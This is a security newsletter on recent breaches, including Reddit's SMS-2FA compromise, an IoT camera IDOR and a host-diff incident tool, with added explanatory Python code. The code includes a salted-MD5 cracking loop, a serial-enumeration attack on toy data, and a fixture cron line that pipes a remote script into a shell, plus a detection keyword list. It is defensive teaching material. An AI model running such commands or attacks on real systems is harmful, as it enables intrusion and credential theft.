An attacker compromised employee accounts on Reddit's cloud provider and source code hosting.
The accounts had 2FA enabled, but it was SMS-based, and the text messages were intercepted. Solid reminder that SMS 2FA is not good enough anymore if you have other options (an authenticator app or a hardware token).
From a customer point of view the impact is mostly limited to an old database backup from May 2007 and the digest emails that were sent in June. Seems like it could have been a lot worse.
Some other breaches/leaks this week
- Cosco: one of the world's largest shipping companies, suffered a ransomware attack.
- Clarkson: another shipping company. It disclosed a breach last year and has now released more information on what data was taken.
- Dixons Carphone: an electronics retailer. It disclosed a breach two months ago but has now announced that it wasn't 1.2 million customers that were affected, but 10 million.
- Fashion Nexus: an e-commerce company, left a database unsecured with the personal details of 1.3 million customers. It included passwords hashed with salted MD5 and SHA-1. The salt stops precomputed tables, but both are fast hashes that a GPU can try at billions of guesses per second, so any password that appears in a common wordlist is as good as plaintext.
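To make the Fashion Nexus point concrete, here is an added example (mine, not code or data from the leak): a constructed "user table" stored as salted MD5, a per-user dictionary attack that recovers every password present in the wordlist despite the salt, and the fix, a slow memory-hard KDF (scrypt from Python's standard library) with the parameters stored next to the hash. Users, salts, passwords and the wordlist are all made up.

```python
import hashlib
import hmac
import os


# Constructed sample data (not from the leak): a tiny "user table" storing
# passwords the way the text describes, as MD5(salt || password).
def md5_salted(salt: bytes, password: str) -> str:
    return hashlib.md5(salt + password.encode()).hexdigest()


LEAKED_DB = {
    # user: (salt, hex digest of MD5(salt || password))
    "alice": ("a1b2c3d4", md5_salted(b"a1b2c3d4", "summer2018")),
    "bob":   ("9f8e7d6c", md5_salted(b"9f8e7d6c", "letmein")),
    "carol": ("00ff00ff", md5_salted(b"00ff00ff", "x7#Qw!p9Lz")),  # not in the wordlist
}

# Constructed stand-in for a real cracking wordlist.
WORDLIST = ["password", "123456", "letmein", "qwerty", "summer2018"]


def crack_md5_salted(db, wordlist):
    """Per-user dictionary attack. The salt defeats precomputed tables,
    but MD5 over a few dozen bytes is so cheap that trying a whole
    wordlist per user costs nothing; only passwords absent from the
    wordlist survive."""
    found = {}
    for user, (salt, digest) in db.items():
        for guess in wordlist:
            if hmac.compare_digest(md5_salted(salt.encode(), guess), digest):
                found[user] = guess
                break
    return found


# The fix: a deliberately slow, memory-hard KDF (scrypt from the standard
# library) with a random per-user salt, and the parameters stored alongside
# the hash so they can be raised later without breaking old records.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def hash_password_scrypt(password: str, salt: bytes = None) -> str:
    salt = salt or os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${key.hex()}"


def verify_password_scrypt(password: str, stored: str) -> bool:
    _, n, r, p, salt_hex, key_hex = stored.split("$")
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                         n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(key.hex(), key_hex)


if __name__ == "__main__":
    print("cracked:", crack_md5_salted(LEAKED_DB, WORDLIST))
    stored = hash_password_scrypt("summer2018")
    print("scrypt record:", stored)
    print("verify good:", verify_password_scrypt("summer2018", stored))
    print("verify bad: ", verify_password_scrypt("summer2019", stored))
```

Running it cracks alice and bob immediately and leaves carol alone, which is the whole story: salting changes nothing about how many guesses per second an attacker gets, only a slow KDF does. The scrypt parameters here are an illustration; pick them so a verification takes tens of milliseconds on your own hardware.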
The headline sounds very scary, but the attack is hard to execute and leaks only 15 to 60 bits of data per hour. The researchers say it might be used against high-profile targets, but your average Joe should be safe. The same mitigations that protect against Spectre variant 1 should work here too.
Using a zero-day that was discovered in April of this year, the attackers change the router configuration to inject a Coinhive cryptomining script into users' web traffic.
Another day, another crappy IoT camera service. This one lets you walk through serial numbers, using nothing but an HTTP proxy, to view other people's streams: the session proves you are logged in, but nothing checks that the camera you ask for is yours.
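An added example of the camera bug (my code and data, not the vendor's): a toy backend with sequential serials, the vulnerable lookup that only checks for a valid session, the fixed lookup that checks ownership and answers 404 for both "missing" and "not yours", the enumeration an attacker runs through a proxy, and a small detector over constructed access-log records that flags a client touching far more serials than one account would own.

```python
from collections import defaultdict

# Constructed sample data (not from the service in the article): a toy
# camera backend. Serials are sequential, which is what makes walking
# them trivial.
CAMERAS = {
    "SN000101": {"owner": "alice", "stream": "rtsp://cams.example/101"},
    "SN000102": {"owner": "bob",   "stream": "rtsp://cams.example/102"},
    "SN000103": {"owner": "bob",   "stream": "rtsp://cams.example/103"},
}


class NotFound(Exception):
    """Stands in for an HTTP 404."""


def get_stream_vulnerable(session_user: str, serial: str) -> str:
    """The broken pattern: the session proves the caller is *a* user, but
    nothing ties the requested serial to that user (an IDOR)."""
    cam = CAMERAS.get(serial)
    if cam is None:
        raise NotFound(serial)
    return cam["stream"]


def get_stream_fixed(session_user: str, serial: str) -> str:
    """Authorization is checked on the (user, object) pair. Not-found and
    not-yours return the same 404 so the endpoint cannot be used as an
    oracle for which serials exist."""
    cam = CAMERAS.get(serial)
    if cam is None or cam["owner"] != session_user:
        raise NotFound(serial)
    return cam["stream"]


def enumerate_serials(session_user: str, lookup, start: int = 100, count: int = 5) -> dict:
    """What an attacker does through an HTTP proxy: replay the request
    with the serial incremented and keep whatever comes back."""
    leaked = {}
    for n in range(start, start + count):
        serial = f"SN{n:06d}"
        try:
            leaked[serial] = lookup(session_user, serial)
        except NotFound:
            pass
    return leaked


# Constructed access-log records: (client, serial, status). Even with the
# fixed handler, a scan is visible: one client touching many distinct
# serials, mostly getting 404.
ACCESS_LOG = [
    ("alice",   "SN000101", 200),
    ("bob",     "SN000102", 200),
    ("bob",     "SN000103", 200),
    ("mallory", "SN000100", 404),
    ("mallory", "SN000101", 404),
    ("mallory", "SN000102", 404),
    ("mallory", "SN000103", 404),
    ("mallory", "SN000104", 404),
]


def flag_enumerators(log, max_distinct: int = 3) -> list:
    """Clients that touched more distinct serials than any legitimate
    account plausibly owns, ordered by how many they touched."""
    seen = defaultdict(set)
    for client, serial, _status in log:
        seen[client].add(serial)
    return sorted((c for c, s in seen.items() if len(s) > max_distinct),
                  key=lambda c: -len(seen[c]))


if __name__ == "__main__":
    print("vulnerable:", enumerate_serials("alice", get_stream_vulnerable))
    print("fixed:     ", enumerate_serials("alice", get_stream_fixed))
    print("scanners:  ", flag_enumerators(ACCESS_LOG))
```

The ownership check is the fix; the detector is the consolation prize for when you inherit a service like this and cannot fix it today. Random, unguessable identifiers would slow enumeration down, but they are not a substitute for the authorization check.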
It's an option you can turn on for your organisation. If Google suspects you are being targeted by a nation-backed attack it will alert you.
Another pretty good overview of things to do to secure your Kubernetes cluster.
Released by the Netflix Security Intelligence and Response Team (SIRT), it takes a baseline host on AWS, compares it to a similar host involved in an incident, and shows the security-relevant differences, like an unexpected listening port or a strange crontab entry.
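The idea behind the tool, as an added example (my own code, not the Netflix tool or its data format): two constructed host snapshots (listening sockets, crontab lines, local users, process names, as you would collect with ss, crontab -l, getent passwd and ps), a set-based diff per category, and a triage pass that turns the raw diff into one-line findings. The hosts, ports and the cron line are made up; 198.51.100.7 is a documentation address.

```python
# Constructed snapshots (not real hosts, not Diffy's data format): what you
# would collect on each box with `ss -lntp`, `crontab -l` for every user,
# `getent passwd` and `ps -eo comm`, reduced to sets of strings.
BASELINE = {
    "listening": {"0.0.0.0:22", "0.0.0.0:443", "127.0.0.1:8000"},
    "crontab":   {"0 3 * * * /usr/local/bin/backup.sh"},
    "users":     {"root", "ubuntu", "app"},
    "processes": {"sshd", "nginx", "gunicorn", "auditd"},
}

SUSPECT = {
    "listening": {"0.0.0.0:22", "0.0.0.0:443", "127.0.0.1:8000", "0.0.0.0:4444"},
    "crontab":   {"0 3 * * * /usr/local/bin/backup.sh",
                  "*/5 * * * * curl -s http://198.51.100.7/u.sh | sh"},
    "users":     {"root", "ubuntu", "app", "support"},
    "processes": {"sshd", "nginx", "gunicorn", ".x"},
}

# Substrings that commonly stand out in a post-incident diff; purely a
# triage hint, the diff itself is the evidence.
SUSPICIOUS_CRON = ("curl", "wget", "| sh", "| bash", "base64")


def diff_hosts(baseline: dict, suspect: dict) -> dict:
    """Per category, what the suspect host has that the baseline lacks and
    what it lost. Categories with no difference are omitted."""
    out = {}
    for category in sorted(set(baseline) | set(suspect)):
        base = baseline.get(category, set())
        susp = suspect.get(category, set())
        added, removed = sorted(susp - base), sorted(base - susp)
        if added or removed:
            out[category] = {"added": added, "removed": removed}
    return out


def triage(diff: dict) -> list:
    """Turn the raw diff into one-line findings an analyst can scan.
    Something that disappeared (auditd, an EDR agent) matters as much as
    something that appeared."""
    findings = []
    for port in diff.get("listening", {}).get("added", []):
        findings.append(f"new listener {port}")
    for line in diff.get("crontab", {}).get("added", []):
        tag = "SUSPICIOUS " if any(m in line for m in SUSPICIOUS_CRON) else ""
        findings.append(f"{tag}new cron entry: {line}")
    for user in diff.get("users", {}).get("added", []):
        findings.append(f"new local user {user}")
    for proc in diff.get("processes", {}).get("removed", []):
        findings.append(f"process missing on suspect host: {proc}")
    for proc in diff.get("processes", {}).get("added", []):
        findings.append(f"new process on suspect host: {proc}")
    return findings


if __name__ == "__main__":
    for finding in triage(diff_hosts(BASELINE, SUSPECT)):
        print(finding)
```

The value of the approach is the baseline: a diff against a freshly launched instance from the same AMI turns "is this normal?" into a short list, instead of eyeballing a whole host.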
Personal note - security officer subscription?
I'm playing with the idea of opening up a "security officer subscription", aimed at companies who can't justify the cost of a full-time security person. For x amount of money you'd get y hours of security work done each month.
Think employee education on 2FA and passwords, taking anti-phishing measures, securing document and e-mail accounts, having backups, working on GDPR, whatever makes sense for the company.
I'm putting out feelers to see if there is any interest in such a thing. If it sounds useful to you or someone you know, please reply to this e-mail :-) Thanks!